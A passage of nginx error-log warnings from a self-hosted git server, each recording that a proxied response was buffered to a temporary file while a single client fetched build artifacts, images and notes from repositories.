git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:56:57 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/31/0000014313 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:57:15 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/31/0000014314 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:57:23 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/31/0000014315 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:57:55 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/31/0000014316 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" +2026/02/17 14:58:01 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/31/0000014317 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" +2026/02/17 14:59:05 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/31/0000014318 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" +2026/02/17 14:59:42 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/31/0000014319 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +2026/02/17 14:59:51 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/32/0000014320 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" +2026/02/17 15:00:02 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/32/0000014321 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" +2026/02/17 15:01:39 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/32/0000014322 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" +2026/02/17 15:02:37 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/32/0000014323 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" +2026/02/17 15:03:06 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/32/0000014324 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +2026/02/17 15:04:36 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/32/0000014325 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" +2026/02/17 15:05:14 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/32/0000014326 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" +2026/02/17 15:06:14 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/32/0000014327 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" +2026/02/17 15:06:28 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/32/0000014328 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 15:06:35 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/32/0000014329 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 15:06:42 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/33/0000014330 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 15:06:48 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/33/0000014331 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 15:06:56 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/33/0000014332 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 15:07:02 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/33/0000014333 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 15:07:15 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/33/0000014334 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 15:07:44 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/33/0000014335 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +2026/02/17 15:07:49 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/33/0000014336 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +2026/02/17 15:07:55 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/33/0000014337 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +2026/02/17 15:14:52 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/33/0000014338 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +2026/02/17 15:14:52 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/33/0000014339 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +2026/02/17 15:20:00 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/34/0000014340 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +2026/02/17 15:22:37 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/34/0000014341 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" +2026/02/17 15:22:42 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/34/0000014342 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" +2026/02/17 15:23:39 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/34/0000014343 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +2026/02/17 15:23:49 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/34/0000014344 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +2026/02/17 15:23:50 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/34/0000014345 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +2026/02/17 15:24:50 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/34/0000014346 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" +2026/02/17 15:32:52 [warn] 921#921: *60316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/34/0000014347 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" +2026/02/17 15:39:15 [warn] 921#921: *60316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/34/0000014348 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +2026/02/17 15:42:08 [warn] 921#921: *61318 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/34/0000014349 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" +2026/02/17 15:45:08 [warn] 921#921: *61318 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/35/0000014350 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +2026/02/17 15:50:28 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/35/0000014351 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET 